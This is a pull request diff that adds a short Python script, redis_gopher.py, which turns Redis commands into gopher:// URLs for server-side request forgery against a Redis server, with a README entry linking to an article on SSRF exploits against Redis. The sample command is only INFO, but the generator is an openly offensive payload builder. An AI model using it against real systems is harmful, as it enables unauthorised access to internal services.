### PR TITLE
feat: Add redis SSRF attack via gopher protocol

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,1 +1,2 @@
 .venv
+.DS_Store

--- a/README.md
+++ b/README.md
@@ -33,3 +33,7 @@ This tool is similar to the `netcat` CLI tool.
 If you need to communicate to a non-http server, you might sometimes need to communicate via 
 tcp/udp protocol instead.
 
+### `redis_gopher.py`
+
+For redis <v7 you can run commands via the gopher protocol.
+See https://maxchadwick.xyz/blog/ssrf-exploits-against-redis for more information

--- a/redis_gopher.py
+++ b/redis_gopher.py
@@ -1,0 +1,21 @@
+host = "127.0.0.1"
+port = 6379
+
+# Command to run on Redis
+info_command = """
+INFO
+quit
+"""
+
+
+def redisToGopher(redis_command: str):
+    return redis_command.replace("\r", " ").replace("\n", "%0D%0A").replace(" ", "%20")
+
+
+def generateGopher(redisCommand):
+    return "gopher://{host}:{port}/_{command}".format(
+        host=host, port=port, command=redisToGopher(redisCommand)
+    )
+
+
+print(generateGopher(info_command))


### PR DESCRIPTION
Added the `redis_gopher.py` script that can run redis commands via the gopher protocol.

The host and port are set to the default redis host and ports.